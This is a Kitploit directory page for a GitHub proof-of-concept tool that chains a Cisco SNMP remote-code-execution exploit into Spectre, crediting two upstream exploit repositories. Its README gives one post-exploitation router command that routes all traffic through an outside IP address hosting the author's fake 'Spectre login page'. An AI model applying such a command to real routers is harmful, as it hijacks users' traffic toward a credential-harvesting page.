Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CiscoSpectreTakeover — A POC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715) | Kitploit
Tools/GitHubGitHub/plyrthn/ciscospectretakeover
Vulnerability AnalysisExploitationWeb Application ExploitationNetwork SecurityPenetration Testing
GitHubplyrthn/ciscospectretakeover

CiscoSpectreTakeover

A POC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715)

View Repository
7 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CiscoSpectreTakeover

A PoC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715)

forthebadge

Credits

Cisco RCE Exploit submodule by artkond: https://github.com/artkond/cisco-snmp-rce

JS Spectre Chrome POC by ascendr: https://github.com/ascendr/spectre-chrome

Tested on a Cisco 1841+2600 Router.

After running the RCE exploit. As config, run:

Router(config)> ip route 0.0.0.0 0.0.0.0 195.20.52.49

This will force all traffic through the Spectre login page I created. At a later date I will add a better version that addresses actually going to websites.

Download Tool